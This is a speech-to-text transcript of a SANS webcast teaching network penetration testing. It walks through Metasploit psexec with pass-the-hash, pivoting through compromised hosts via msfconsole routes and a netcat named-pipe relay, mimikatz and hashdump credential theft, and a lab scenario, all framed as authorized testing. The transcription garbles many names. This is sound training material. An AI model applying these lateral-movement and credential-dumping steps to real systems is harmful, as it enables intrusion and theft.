SANS Pen Test: Webcast – Adventures in High Value Pen Testing A Taste of SANS SEC560

hello everyone and welcome to today’s webcast adventures and high value pin testing a taste of sand security 560 by Ed SCOTUS my name is Trevor and I will be moderating this webcast today’s featured speaker is Ed SCOTUS sands pin test curriculum lead before I turn things over him the Q&A portion will take place at the end of the webcast so please feel free to submit your questions at any point by using the questions window right now I’d like to turn things over to Ed Thank You Trevor I really do appreciate it and I’d like to thank everyone for joining us on this webcast this this webcast is one in a series of webcasts that sands does that are often referred to as a taste of something rather usually a science class where we give you a sample of Sam’s course material so that you can integrate that kind of stuff into your own job today we’re going to be focusing on a taste of sands security 560 which is a course focused on networked pen testing and my goal over the next hour or so is to give you some ideas that you’ll be able to incorporate into your next pen test this webcast is sponsored by sands pentest Austin this is an event that we do at sands we’re gonna do it annually it’s the first time we’ve ever done it and we’re really excited about it it’s gonna be really significant if you do anything that’s associated with penetration testing vulnerability assessment whether you run those things yourselves or have to deal with the aftermath from May 18th to May 23rd mark your calendar it’s an important thing we’re gonna do some cool stuff there it will be in Austin Texas and we’re gonna have six offensively focused classes we’re gonna have the sand security 560 class I’m going to be teaching that there we’re gonna have 504 the 401 class on cyber defense is going to be there we have a whole bunch of really cool classes the other thing is we’re gonna be doing some special stuff in each evening so we got six fantastic classes for you to take one of the evenings well actually three of the evenings will be devoted to networks so we’re saying net wars net wars networks this is um Sam’s challenge environment it’s a sans cyber range really and you’ll be able to participate it in three nights normally for a medium sighs or large-sized sands event we only do networks for two nights we do it here for three nights oh and then one other night there’s a fourth night we’re gonna be doing cyber city you see we built a fully functional model city it’s actual physical city six feet by eight feet but it’s got real industrial control systems in it to control everything including things like the power grid traffic lights and so forth and you’re going to be hacking into the city as well as defending the city on one evening during this pentest austin event we’re also doing something called Koyna Palooza check that out for each sam’s course in pentesting we have a challenge coin that you can win so there’s like a 504 calling a 560 coin there’s a 542 coin all these different coins for different stands pens has courses if you come to this pen test austin event and you participate in networks over those three evenings you have your chance to earn a whole bunch of Susanne’s pen test coins you can earn up to five sans pen test coins each coin a different one for a different class we call it coin a Palooza that’s pretty cool we’re also going to have barbecue that’s just the nature of Austin Texas right and we’re gonna do a lock-picking evening as well so that’s kind of a new and fun thing for sands to do I love picking locks so we’re throwing everything we can into this you got six great classes you got three nights two networks you got a night a cyber city you got coins coming out of your ears and coin a Palooza I’ll be sitting there at a booth passing out those coins as you guys earn them based on your networks performance we got barbecue the it’s it’s gonna be cool you might want to check it out in more detail it’s at sam’s org slash pentest 2015 Sansa dork slash pence s 2015 I hope you can make it it’s gonna be a really cool event let’s go to the next slide so the topic for this webcast is a taste of sand SEC 560 adventures in high-value penetration testing and the materials I’m going to go over with you are directly from the sands security 560 course some of you may have taken the course in the past that’s cool you’ll get to see some of the stuff that we’ve incorporated in recently so if you’ve never taken the course great I’m gonna give you some ideas that you can apply in your own jobs directly from the course itself but let me introduce myself Trevor did a short introduction a couple minutes ago but let me just go over this in some more detail I wanted to have something kind of fun and quirky to introduce myself so imagine that I could issue my own ssl certificates well I suppose anybody can right the issue is whether the browser will trust it well you’ll see here at HTTP colon slash slash EDS CODIS yes it’d be nice to have your own top-level domain as well you’ll see that it’s a HTTPS connection and if you go to the details of the certificate it shows you what I’m all about I’m a penetration tester I’m an incident

handler if you if you look at my career it’s focused very much on red teaming penetration testing and using offense to help try to improve the defenses of our environment I mean that’s what that’s what penetration testing should really be focused on it’s what I’ve really really tried to zoom my career into I’m also a sans instructor and course author I’m the pen test curriculum lead for sans and also the director of the networks and cyber city projects it’s really an honor to be able to speak with you thank you so much for your time let’s uh let’s talk about the context of the sans security 560 course you see the Sam security 560 course fits into the pen test curriculum like I show you here we have the 504 course maybe some of you have already taken that course that’s cool it covers hacking attacks and incident handling so it’s a mixture of offense and defense but then when you move into the pure-play offensive courses you’ll see Sam’s 560 is one of the first ones here it’s important to point out 504 is not a prerequisite for 560 you could start with 560 then go to 504 or vice versa either way is fine but 560 is one of the flagship pentesting courses for sans because it covers the the technologies the tools the mindset and the methodology for doing effective pen tests that’s what 560 is all about and that’s what this webcast is all about now if you really get into this stuff you can then go from 560 into 660 which is advanced pen testing and you can even go into deeper stuff like 760 which is advanced exploit development it is insane it’s really an incredible class it gets into things like writing exploits to defeat address space layout randomization it gets into things like Windows kernel memory and manipulating that the Linux heap and a lot more Gemara on the web app bent we have 542 and 642 two great classes for web app and testing if you’ve got the foundations of penetration testing under your belt like maybe you’ve taken five oh four or five sixty or five 42 and you want to get some more hands-on stuff we have the 561 and 562 classes these are 80% hands-on he’s 561 and 562 classes the idea there is you understand the methodology already got that down you understand the tools but you want to take your career to the next level with a whole bunch more hands-on if you’re more interested in learning how to tweak your tools and write new tools we’ve got Python for pen testers that’s the 573 course and if you’re more into the mobile device and wireless side of things we’ve got SEK 575 for mobile device security and pen testing and 617 for wireless security and pen testing so we got a whole bunch of these different courses out there if you have an idea for an additional Sam’s course let me know because part of my job is curriculum Lee is to make sure we have courses that are useful to you in your career so please do inform me we also have some resources that you can see on the left-hand side of the of the slide here but our focus here is going to be on the sans 560 course now 560 is a 6 day course and it consists of these parts section one is on comprehensive planning scoping rules of engagement and doing in-depth reconnaissance 560 point 2 gets into in depth scanning so we go over all these different scanning options scanning capabilities so you can enumerate your attack surface that’s what that’s what 560 point 2 is all about it’s figuring out what the attack surface is so that you can then exploit it and pivot through it 5 60.3 is about exploitation and what to do once you’ve successfully exploited it and then once you get in there you can start doing things like password attacks and merciless pivoting that’s what day four is all about now to be a really good network pen tester I think you really should have some pretty good skills on both the wireless and web app side of things and that’s reflected in the 560 course because sometimes is a network pentester you’re called upon to evaluate the security of the wireless interest structure or oftentimes as a network Manchester you get called upon to look at web apps and you need to be conversant in the most powerful tools and capabilities in those particular arenas you see from a philosophical perspective I do think that some pen testers have over siloed themselves there are some pen testers out there who say look I’m a really good network pen tester that’s what I focus on or others say I’m focused on Wireless or some others say my deal is Web Apps that’s where I focus and those are all well and good you might want to choose an area to focus but if you are only focused on just those topics I think you’re gonna miss the big picture and not be as valuable so the whole goal of the sand security 560 course is to get you ready to do a high value penetration test through scanning through rules of engagement through exploitation through merciless pivoting and yes indeed doing Wireless and web apps the whole course finishes with a capstone which is a full-day pen test you work in teams of up to five people you work your way through a capture the flag contest the winning team each person who the winning team gets that coin remember I mentioned

those coins earlier for coin Palooza if you take the class and you come in the winning team you get that coin and each of those coins has a cipher on it so if I can go back a slide you see we have these different coins here on the screen you can see I’m pointing to my screen with that with my finger obviously you can’t see that but have a boy here with my boy there each one of these is a coin and the coin has on it a cipher so the 560 coin if you flip over to the back there’s a cipher on it that you get to crack by 42 as a cipher on it 504 has a cipher on it now some of these ciphers are ancient they’re from thousands of years ago others are old maybe antique they’re from hundreds of years ago some of them are from about I don’t know say 70 years ago and some other ones are ones that we created just for these specific coins so you win the different coins by coming to coin a Palooza or winning the flight’s the capstone of your class and then you can crack those ciphers all right so let’s talk about the sand security 560 course and then start giving you some specific ways to think about your job as a pen tester and weights to do that job more effectively so the focus the relentless focus of the sand security 560 course is to help you master the skills you need to be able to do an effective network pen test it’s organized around the workflow of pen testers and that’s what the whole thing is about there’s there’s actually over 35 labs in the class because we want to make it really hands-on and if you if you average it all out and look at the amount of hands-on material in the class it’s about 45% hands-on 45% hands up so there’s lots of labs for you to do like I said it’s over 35 of them and it culminates in that full day pen test on day six so by the time you get out of the course you’ve covered all these different labs and all the concepts under those labs done them all hands-on and you’ve done a pen test as part of your team of five on day six additionally the course includes tips for avoiding common pitfalls in pen testing so we frequently say well you could do it this way and there’s a chance that it could crash the target machine or you can do it this way and it might take you three days or three months or three years or you could do it this way and it’ll go so much faster and it lowers the chance that you’re gonna crash target machines so the course is really full of a whole bunch of those tips and tricks that I myself have learned over the years and I put into the course but I’ve also had so many different folks give me ideas and topics that I’ve incorporated into the course itself I got some great tips and tricks from from a whole bunch of different friends throughout the years that I baked into the course so we can all benefit from them all right so let’s let’s take a step back now and do a formal definition of pen testing and there’s a method to my madness here the reason I want to focus here on what is pen testing is there’s a lot of confusion in the industry some people will call a vulnerability assessment a penetration test and then and then when they ask for a pen test they get surprised when somebody’s trying to exploit them or some people will call a pen test a vulnerability assessment and they ask for a vulnerability assessment and then when you don’t actually start exploiting them they think you left something out so we need to be clear and crisp in our terminology so to that end I offer you this formal definition of penetration testing and this definition I’m about to give you by the way is compatible in fact it is identical to the definition of penetration testing included in the sans critical controls have you heard of the sans critical controls project it’s it’s it’s essentially a baseline of security actions that you can do to radically improve the security of your infrastructure and it includes penetration testing and the section of the critical controls on pen testing has an identical definition to the one that you see here I know it does because I wrote that section of the critical controls but anyway also if you look at other things that involve information security and penetration testing you’ll see that this is compatible a compatible definition with what you’ll see there for example nist special publication 800-53 talks about all the different kinds of things you can do to have an effective security program and you’ll see the definition of penetration testing that I’m using here is compatible with their definition of security testing so what is the definition we’re going to use here penetration testing involves modeling the techniques used by real world computer attackers if you’re not using the techniques of real-world attackers you’re not really providing an effective penta you want to do with the real world bad guys do you’re trying to model effective threat actors here well to whatever you trying to do you’re trying to find vulnerabilities now if I stopped right there we’d be doing a vulnerability assessment and there’s huge value in vulnerability assessment don’t get me wrong I’m not here to dismiss vulnerability assessments but pen testing goes further it’s not just about finding the vulnerabilities it goes further so that under controlled circumstances you actually exploit the flaws that you discover the word penetration is there for a reason you’re trying to penetrate the target environment and you’re doing this in a

manner that is professional you want to do it as safely as you can and you want to do it according to a good scope and really good rules of engagement now sans is put together scoping and rules of engagement documentation that you can download from the sans pen test website if you do a google search on sans pass and test resources you can find that we’ve got these documents available there for you and in five sixty class we walk you through creating an effective scope and rules of engagement now why are you doing all this you’re trying to determine business risk and potential business impact it’s a huge thing your goal here is to help the organization improve security practices now let me tell you about how my own thinking on the effectiveness of pen testing has evolved in the past five years if you were to ask me five years ago Edie why do you do pen testing one of the main things I would’ve said to you is so you can find flaws before the bad guys do and fix them now that’s still true but I don’t think it’s the primary reason why you do pen testing it is a reason but not the primary reason the primary reason you do pen testing is to help better understand your risk posture and then manage that risk posture it’s an important distinction the two are not completely incompatible but when you’re doing a pen test or even if you’re not a pen tester and you’re hiring somebody else to do pen testing for your organization remember to focus and keep those pen testers focused on better understanding business risk it’s not just merely finding flaws and checking boxes instead it’s understanding risks so that you can use your precious limited resources to best mitigate the risks that you discover think about pen testing that way and you’ll get more value out of it all right well why do we do this exploitation thing all right I mean I mentioned before vulnerability assessment is a good thing to do what why don’t we just do that you get a list of vulnerabilities you mitigate against them you’re done the fact is exploitation that crucial piece that differentiates a pen test from a fall assessment gives you more information first of all it helps you do false positive reduction or maybe even elimination it’s hard for somebody to argue we’re not vulnerable when I have shell on their target machine it is worth noting though even if an exploit doesn’t work you should still report on the discovery of a potential vulnerability see sometimes you’ll be finding a vulnerability a choice one and you’re trying to exploit it and it just won’t work it might not work because they have some mitigating control in place maybe maybe there’s a host-based IPS our network based I pS intrusion prevention system that blocks it or or maybe it’s just the luck of the draw you see exploits typically work on a probabilistic basis no exploit works a hundred percent of the time even against a vulnerable system some exploits work ninety-five percent of the time some work fifty percent of the time some work five percent of the time so even if an exploit doesn’t work I advise you to still include in your report the fact that you’ve discovered evidence of a vulnerability you should say in your report you were unable to exploit it but the organization should still look at that vulnerability and consider risk mitigation now the other reason we do exploitation is it’s a proof that vulnerability is there and therefore a more realistic treatment of risk think about it this way what if you were to tell the target organization if you found a massive vulnerability on a given machine on their DMZ and you didn’t exploit it because it’s just a vulnerability assessment so you found a vulnerability but no exploitation you’re not doing that and you report that in and the business decision makers look at that and they say okay what was on that machine what what sensitive was there and the answer is nothing there’s there’s no sensitive information on that box and they’ll say okay well you know maybe in a month or six months we’ll fix that one versus a penetration test in the penetration test you found the same vulnerability that the vuln assessment found but now you have a chance to exploit it and you exploit that machine you get on it and you find it has no sensitive data but you have shell on the box once you’re on that machine on the DMZ you can then start looking around to see what other machines are nearby and maybe start attacking those in fact I’m going to give you an example from a lab in five sixty where we pivot mercilessly through the target environment so we can hack into one machine and from there we’re gonna hack into another machine and another machine just spreading our way through the target organization so you exploited that lung box on the DMZ found nothing on it but you did find that it had a TCP connection to port 445 on another Box TCP 445 that’s used for server message block so you decide to pivot from the one machine that you’ve conquered on the DMZ to another machine on TCP port 445 when you get to that other box maybe you find 10 million credit cards and you report that now what do you think the target organizations gonna say when they discover that this critical vulnerability on this one machine which

had no sensitive data allowed you to pivot through the organization and find another machine where you’re able to get access to ten million credit cards you think you’re gonna say oh we’ll fix that in a month or six months no you have now provided them more value you’ve given them a better understanding of their risk and they’re gonna mitigate it more effectively and more quickly that’s the big point here using one machine as a pivot to get deeper inside the network the way it might work is you the pen tester might exploit a machine on the DMZ and from there you can attack other machines on the DMZ or pivot to get to an internal machine or increasingly you know what I like to do I like to exploit a client-side machine an internal box and we have some labs in the sand security 560 course where we exploit internal machines and then from there pivot to other internal machines or even to a DMZ system one thing that I find quite effective is exploiting that client machine using ipv4 right maybe I trick them into surfing to my website I deliver back an exploit and I’m on that machine and maybe I’ve exploited in via ipv4 from that machine I might start exploring the internal network looking around with ipv6 we give you some tips for doing that in 560 class but for right now just remember you might exploit a machine over ipv4 and then once you get on that machine start looking around for ipv6 stuff because it’s often allowed on intranets especially on just local area networks a lot of people leave ipv6 enabled on their boxes but aren’t is carefully filtering it or looking for attacks against it and plus exploitation leads to post exploitation which really helps you understand the business risks of the target organization so that’s why we do exploitation that’s the unique perspective that pentesting gives us now there are risks of exploitation for example when you exploit a target machine you could crash a service so that service is just down that’s bad news it could get even worse than that though you could crash the whole system maybe a blue screen of death or a kernel panic on a say a linux box or something something like that that would be bad but I’m doing a pen test and something’s gonna come down I’d rather have it come down right now so that I could contact an emergency phone number and the target organization saying look the Machine just came down can you help fix it versus impacting a system stability or integrity what I don’t want to do is hit a system during a pen test have it continue moving forward kind of limping along in a hurt fashion and then it crashes a day or a week or a month later that’s really bad news I don’t want that now we’re gonna talk about some techniques for trying to minimize the chance of that happening and I’m gonna cover something I call the pen testers pledge for you in just couple minutes now that also could be data exposure with legal ramifications as a pen tester you don’t want to get and download 10 million credit cards when I talked earlier or on previous slide about getting access to 10 million credit cards that’s what I meant you get access to those credit cards but you don’t want to download them because then your system well could become subject of attack and you’re now responsible for protecting all that credit card information as a pen tester you want to get in and measure what you have access to without actually downloading all that stuff you don’t want a million healthcare records you don’t want ten million credit cards you don’t want all this sensitive PII or pH I you’re measuring access and you do that by sampling small amounts of it we talked about some examples in the 560 class about how to sample things like by sending in database queries that just count the number of rows in given tables or counting the number of lines in file and more also you could inadvertently access the wrong system this is scaring dangerous stuff ipv4 addresses aren’t that big it’s easy to transpose to numbers right so for example an IP address of 10 11 12 13 is very different than 10 11 . 21 13 and right it’s just you’ve just transposed those two numbers and that’s a totally different system maybe one that’s not in your scope it could be out of scope of the target organization or maybe even a completely different organization I’m not trying to scare you away from doing exploitation it is a fine and wonderful thing to do in pen testing I am trying to say though do it careful we do it intelligently verify that exploitation is allowed in your rules of engagement that should define upfront and the pen test and then double check while you’re working on the pen test that that you tell them that you’re hey you’re about to enter the exploitation phase one of the things we really love to do in a pen test is have a daily debriefing with target system personnel to say to them hey um you know here’s what we accomplished today and here’s what our plan is for tomorrow and do that every day during the pen test you don’t want it to be a big burden you don’t want to spend you know an hour or two on your daily debriefings it’s about 10 or 15 minutes just adding some transparency so that they could see what you’re up to and for one of your daily debriefings you might say okay we

finished our scanning phase and we’re not moving into exploitation here’s what we plan to exploit it’s good to give them that heads-up and always remember the probabilistic nature of exploit success I mentioned it earlier here that some exploits work 90 some percent of the time others don’t and you need to understand that as you’re doing it sometimes when we’re doing the sands 560 class somebody will run an exploit and it doesn’t work and they run it again and it doesn’t work and they run it a third time and it works and they say to me why did it work the third time and I said because the third time things all came together in fact with things like address space layout randomization ASLR the operating system vendors are trying to make it even more stochastic even more pseudo-random so that exploitation success is lower but if we carefully choose our exploits we may be more likely to get successful execution now I’d like to review a couple of tools for you here and then I’m gonna put them together in a scenario that we do in a lab for sans five six and I’ll walk you through all the different piece parts so you can see how you can use that in your own environment now one of the major tools we use in the 560 courses of course Metasploit a fantastic tool for doing penetration testing it does all kinds of things but it includes an exploit arsenal now Metasploit is available on a free basis there’s also a commercial implementation Metasploit called Metasploit Pro you use a Metasploit user interface like MSF console which it gives you a Metasploit command prompt to choose a given exploit which might attack a target machine exploiting a buffer overflow condition exploiting some other problem in the target environment so the exploit gives you code execution it could be a client-side exploit where you’re going after a browser or Adobe Reader or the Java environment or it could be a service side exploit where you’re going after listening service on the network you take your user interface and you choose an exploit you then choose a payload the payload is the code you want to run over there and one of the best payloads and Metasploit is the meterpreter it’s a very full feature command shell created for computer attackers you choose your exploit choose your payload you apply them together and you launch them at the target now Metasploit also includes things like auxilary modules which will scan for well given services in a target environment or do things like port scanning or do things like fuzzing with a very user input looking to see if they can cause some sort of crash condition or other unusual circumstance in the target environment and then there’s post modules which you run after you’ve successfully exploited a target environment that’s post module some of them will let you dump credentials some will let you plunder the target environment really really useful stuff so this is sort of the the arsenal of different Metasploit piece parts but one of the most useful exploits in all of Metasploit is the PS exec module now PS exact was originally introduced by mark russinovich over at Microsoft System turtle so he did it a long time ago as well over a decade ago but the folks at Metasploit have incorporated it into Metasploit itself now it’s completely separate code it’s not using the sysinternals code at all instead they use a very similar concept but they’ve written their own Metasploit code to do this and it’s fantastic if you have SMB access of a target machine that is you’re able to get into that target Windows box to be a server message block and you have admin credentials such as an admin username and admin past sort the PS exec module lets you get code execution on target box now it’s in an exploit module it’s under exploit windows SMB PS exec for Metasploit but it feels weird calling it an exploit because it’s just using built-in Windows capabilities orchestrating those capabilities through a piece of code that comes with Metasploit that’s the PS exec module and the way it works is it establishes an SMB session to the target box you choose that given our host that’s the thing you’re trying to exploit you define in Metasploit and SMB username and SMB pass that’s the password and then you exploit the target box and it runs a payload over there such as the meterpreter the way it works is it’ll make an SMB connection and then across that SMB connection it writes an executable into the targets file system and then creates a service to run that executable it runs that service which launches the executable which is usually a Metasploit payload like the meterpreter and then it automatically removes the executable and the service it cleans up after itself I should point out this is unlike the PS exec module from sysinternals this exact tool from sysinternals leaves the PS exec service behind the Metasploit module now cleans that up which is pretty cool also it supports pass the hash so with Metasploit PS exact you can authenticate with a username and password in the administrators group or a username and hash and this is one of the most useful exploits in all of Metasploit that’s why I put it in all caps here especially if you’re in a fully patched Windows internal network environment and this leads to this concept I call it the pen testers pledge the idea here is there’s

a bunch of vulnerable code that runs on various machines but if you were to launch say a buffer overflow exploit or a format string attack or some other kind of attack to get into a target piece of software there’s a chance you could crash the software or maybe even cause a roomful of blue screens of death that would be awful my point here with this slide and the pen testers pledge is once you get access to a Windows environment like say a given machine dump the hashes from that environment and then from there spread to other machines using PS exec because when PS exec exploits a target machine it creates its own process it actually will run its code out of a process called run DLL 32 XE and if that process crashes you don’t care because it was created by PS exact execution itself as opposed to exploiting say some vulnerability in iis or VNC or some other listening service or even some client once you get the hashes spread through the target environment lowering the risk of crash target software you can do that with PS exec so that got me thinking about this sort of one of these despair posters I’m sure you’ve seen the despair posters and I put one together with a roomful of blue screens of death and I call it the pen testers pledge and the pen testers pledge works this way I’ll go ahead and take it for you here I head SCOTUS I state your name ed SCO’s do hereby pledge to use PS exact to exploit Windows target machines after I’ve gained admin credentials an SMB access of the target environment so maybe you’ve gotten into a machine on the DMZ or on the internet and you’ve grabbed those credentials and now you have SMB access to other machines I shall forsake other service side exploits thereafter otherwise I unnecessarily risk crashing target systems if you do a Google search for pentesters pledge you can download this if you if you want to want to have a copy of it I was so excited because when I originally put this together I tweeted it and mark russinovich himself retweeted it so it was kind of neat I had a little bit of a fanboy thing going there for a bit alright additional capabilities and tools Metasploit also includes the route command at the MSF console prompt and what I’m going to do is I’m going to pull some things together in an example scenario I’m gonna walk you through a big scenario where we’re gonna use a bunch of the ideas we’ve been talking about here so first idea we’ve been talking about is PS exec and how wonderful it is second idea Metasploit has the route command in the route command at the MSF council prompt I can implement a nice convenient pivot check this out by pivot I mean I can attack one machine and use that one machines location in the network and its resources to attack another box so I’m gonna do here is at my Metasploit framework console prompt I’m gonna use some exploit one and set some our hosts this is my target machine – victim 1 I’m gonna set some payload this is the thing I want to run on the target to say I’m meterpreter so I get to have wonderful meterpreter shell and then I exploit it so now I’ve gone from my pentesters box and I’ve gotten meterpreter shell on victim 1 it gives me a little meterpreter prompt I can then background mat prompt by either typing the background command or by hitting ctrl Z and they’ll say you want a background this I type Y and it will background it and it shows me my meterpreter session ID the meterpreter session ID is just an integer that starts at 1 and goes out by one for each new session that you get then at my MSF prom now listen carefully to this my MSF prompt I can say route ad and then I can give it victim to subnet and then some subnet mask and an accession ID number from my interpreter session with victim 1 and what that tells Metasploit to do is any new traffic I have it is destined for victim 2 subnet I want that carrying across the meterpreter so it will go from victim 1 into victim 2 as far as victim to his concerns victim 1 has just hacked him now the important point here well so what i could do is i could do use exploit – maybe it’s PS exact set your our host – victim to set your payload whatever payload you want and then exploit it and now Metasploit says i’ve got traffic destined for victim – i carried across my meterpreter session from victim one so it goes from victim 1 into victim 2 and this lets you pivot and you can make these things nested you can go from machine to machine to machine throughout the environment this way it’s very powerful but here is an important thing to remember don’t confuse the Metasploit framework console route command with the meterpreter route command this is something when we teach the 560 class I beg the students not to make a mistake with and when I’m begging them to say is don’t type route at the meterpreter prompt when you want to implement a pivot you can see route at the meterpreter prompt will let you manage the routing tables of victim 1 which is good unless you accidentally type in a bum route a bad route into victim 1 you’re going to destroy victim ones routing tables such that victim 1 might not be able to communicate with victim 2 and victim one might not even be able to communicate back with you so my point here is be very careful with the route command type it at the

meterpreter prompt and you’re gonna change the routing tables of victim 1 most likely if you want to implement a pivot you’re gonna want to type the route command at the MSF console prompt MSF prompt by itself that implements up hibbett when you use the route command at the meterpreter prompt you’re changing the routing tables all right another topic that I wanted to just briefly describe to you is pivoting not using Metasploit framework consul route command that’s cool but another form of pivot it’s a net can’t we use them in 560 as well we use MSF route we also use this technique this net can’t relay what here I have is an attacker machine which might be a Windows box could even be a Linux machine with some sort of SMB speaking client software here I have a target Windows box but let’s say my attacker machine can’t get direct access to the target box because it’s firewall but there might be another machine let’s say it’s a Linux box maybe it’s on a DMZ or even on an internal network but I can gain access to and what I could do is I could run SMB client software on my own machine and set up a pivoting relay through this Linux box let me go back to slide to get access to that SMB service on the other side and you can do this with a traditional netcat relay but I added for the 560 class a little twist into this relay watch what I’m going to do here I’m gonna use the make nod command which is a linux standard command to create a special entity in the filesystem I’m gonna call that entity back pipe and I’m gonna make it of type P that means I want a named pipe named pipes are special things in Linux file systems it means I can dump data into them and the date of it comes out is gonna be in FIFO order the first data that I dumped into the name pipe is going to be the first data that comes out FIFO and then I can implement it net can’t relay to pivot SMB which normally uses TCP port 445 this way I’ll say net cat listen this is gonna be on this Linux relay machine most Linux is include net cap by default so net cat listen on local port 445 I’m gonna skip over the 0 less than backbite for just a second whatever data comes into this netcat listener TCP connection comes in I’m gonna pipe it into a net cat client to shoot it to my target Windows machine I’ll say its IP address 10 10 10 10 on port 4 four or five that fords the data in whatever data comes back from the target I pipe into T the Linux T command is very special command what it will do is it displays on standard output any data that comes on standard input so this will display the s and B on the screen of where I’m running this listener to client relay T in addition to putting stuff on the screen will also write it into the filesystem so it writes it into this Pyke called back pipe zero less than means this netcat listener gets its standard input from the back pipe so the netcat client whatever it receives back will dump into the back pipe forwarding it through the listener so it makes a two-way relay so all data goes forward and all the responses come back it’s a traditional netcat relay and it’s a darn useful thing then on my attacker machine I can do net use say it’s a Windows box I’m just gonna make an SMB connection with backslash backslash and I give it my Linux machines IP address see dollar sign so I’m actually mounting a share and as far as my SMB client net use command says I’m actually going to my Linux machine but my Linux machine is just forwarding that to the target Windows box so it implements a beautiful pivot and I could mount to share there with net use or I could use PS exact whether it be system journals yes exactly meta split yes exact or I could grab hashes all kinds of things very useful idea one additional idea why introduce you before we get into the scenario is this it’s a tool called mimic ATS you may have heard of it it actually came out a couple of years ago and it’s tremendously powerful it was created by Benjamin Delpy who also goes by the NIMH gentle Kiwi its focus is on pulling credentials from memory it will search through the memory of Windows processes looking for land man hashes NT hashes and clear text passwords it can pull them I’m telling you I I work a lot on large-scale breach cases and over the last 18 months there have been several big breach cases ones that are written up in the newspaper where the bad guys have used mimic cats and remember how I define pen testing our job as pen testers is to use the tools the techniques the capabilities that real-world bad guys use we want to mimic their activities bad guys are using mimic cats if we’re gonna mimic them well we can use them in the cats too now originally it was created as a separate executable mimic cats dot XE that you’d have to push onto a Windows box but now it’s a Metasploit meterpreter module so once you get the meterpreter loaded onto a target machine and running maybe you got the meterpreter running there by using PS exact you can then type load mimic cats it extends the features of meterpreter so now it’s got mimicked ATS commands

and one of these commands is w digest which searches a specific area of else’s memory to try to pull clear text passwords really powerful so I’d like to do now is that I’ve given you those different ideas we’ve talked about PS exec we’ve talked about the meterpreter talked about an MSF console we’ve talked about the route command at MSF console to pivot things we’ve talked about netcat as a pivoting capability using netcat relays and we talked about mini cats so let’s pull them all together here and now this is a lab that we do in Sam security 560 we do it all hands-on there but I want to walk you through step by step so you can see the scenario that a real pen tester would use to pivot mercilessly in a target organization all right so here’s the scenario and I really try in the class to illustrate these things graphically because I think in pictures myself I’m a product of the Macintosh sesame street’s visually oriented generation maybe many of you are as well and I like to think about these things visually I also like to work at the command line so I’m a visual guy who likes to work at the command line and I think you’ll see that in the 560 course because the way I do the command line stuff and a lot of figures that illustrate what’s happening here so the scenario here is you have a Linux box and you’re running Metasploit you’ve got a compromised machine on the DMZ I’m not going to cover how we compromised that because I wanted to keep us focused on the pivoting stuff but you have shell on a DMZ target machine at ten ten seventy five one it’s a Linux box what you’re going to do is you’re gonna create one of those netcat relays so you’re gonna listen on inbound TCP port 45 45 whatever data comes in you’re gonna forward to target one on port 4 4 5 you’re then going to use Metasploit PS exact to get the meterpreter running on this target Windows box by going through your Linux machine and then get the meterpreter prompt coming back and then you’ll do a hash dump on that once we’ve done that we’re then going to pivot using msf route to attack 10 10 10 20 but we’ll do that a little bit later so the first start here of this lab is to set up a net can’t relay on are compromised linux dmz machine meant to PS exact through it so we can get meterpreter and hashes from the box alright so we start by launching our Metasploit framework console here I’m just running MSF console and it pulls up Metasploit choosing from different ASCII art work I like the one that shows the Metasploit cow and here I’m gonna do use exploit windows s Mbps exec so this is the PS exec module for Metasploit then i’m going to do service iptables stop service IP table stuff i want to turn off the firewall on my own linux box otherwise any reverse connections i have coming in like my meterpreter session that i want to be a reverse connection it’ll be blocked so I’m turning off my firewall and I’m also assuming that I have a username and password for the target box remember PS exec requires SMB access and it requires an admin username and password let me go back a couple slides so I’ve gotten those by maybe plundering the target environment or by doing password guessing so I’m going to take that SMB session that I’ve set up using PS exec going through my compromised Linux box to get the meterpreter run on the target box and make a connection back to me the tcp port ii the reason I’m doing TCP port 80 is many networks allow that outbound right so it’s gonna connect back to my own machine on TCP port 80 and I’m gonna do a hash dump alright the reason I turned off my firewall is otherwise that TCP port 80 wouldn’t be allowed back in cool I still got my firewall off I’ve set my assembiy user I set my SMB password now I show you the figure here again so you can kind of see illustrative wise what we’re doing here I’ve got to set some Metasploit variables imma set my our host to my Linux targets at my our hosts of 10 10 75 one because this limits machine is going to be attacking ten ten ten seventy five one on our port of 45 45 this is actually a wonderful capability of Metasploit PS exec normally SMB just uses TCP port four four five but in meta split we’ve got more flexibility it defaults the PS exec module to talking SMB over port four four five but what if I can’t use port four four or five on this Linux machine it might be fire walled off it might some other service on it like a Samba daemon but as long as I can find any other port that I can listen on I can set my are port for Metasploit to attack that port so here I’ve just chosen 45 45 as an example but it could be something else it could be any port that happens to be allowed into this Linux box where I could forward things through I then sent my payload to Windows meterpreter reverse TCP I then set my L port to 80 so that when it communicates back it’ll be communicating with port 80 and then I show my options just to review it so what I’ve set up is PS exec on Metasploit so it’ll exploit this Linux target at least that’s what it thinks it’s gonna exploit where I’ve got a

listener on port 45 45 when that connection comes in it will deliver to the target machine the meterpreter payload which will then execute PS exact style to make a reverse TCP connection back to my own box suite I then have to go to that Linux machine remember I have I have shell on that Linux machine the one that I’m pivoting through and I’m gonna create my relay I’m gonna call it this I’m gonna call the file the the named pipe I’m gonna call it MSF backplate because I’m Metasploit so I’m gonna see it in the slash temp by the way when I’m hacking a Linux machine I like to put stuff in the slash temp because it’s just temporary and I can delete it afterwards and nobody else should be relying on it it might get me noticed I admit but usually the stuff I’m putting in there isn’t gonna be there for a long term I then do a make nod MSF back pipe P because I’m making a FIFO I have my netcat verbose lis listening on local port 4545 pulling it standard input from the named pipe called MSF Bank pipe any data that comes in I’m piping to a netcat client to connect to 1010 1010 on port for four or five because I have to go to four for five that’s where Windows listens for SMB any data that comes back I’m gonna T so it’ll display it on the screen and dump it into the MSF back pipe once I’ve got that Linux target set up I then type exploit so that Metasploit says I’m going to PS exact to remote target 10 1075 one remote port 45 45 giving it an SMB user and SMB password which gets forwarded through my netcat relay giving me code execution on 10 10 10 10 it’s going to create a service use the service to run the meterpreter the meterpreter is gonna make a connection back to my machine on TCP port 80 it will then delete the executable and delete the service on 1010 1010 and now I have my meterpreter session when I type exploit you’ll see it says uploading payload it’s got the executable with the pseudo-random name and it creates a service to run that and then it shows me I have a connection coming back to my machine from 1010 1010 cool I can then do things like hash dump which will dump the hashes from the target box or run hash dump these are two totally different ways to get hashes from Target Windows machines what hash dump does is it pulls them from a certain area of alsace memory and you can see here I got the different hashes for the Box if I do run hash dump run hash dump tries to pull them from the registry it’s not pulling them from memory and you say which of these two techniques is better well run hash dump has less of a chance of crashing the target machine so run hash dump is safer because it’s just going into the registry in the file system well why wouldn’t I always do run hash dump well sometimes there’s a host-based IPS that may block it that’s why it’s nice to have the option of getting it from memory although there’s more of a chance I would crash it with the hash dump command so I could do hash table or run hash table either way is good run hash dump is a little safer notice also it says that it’s 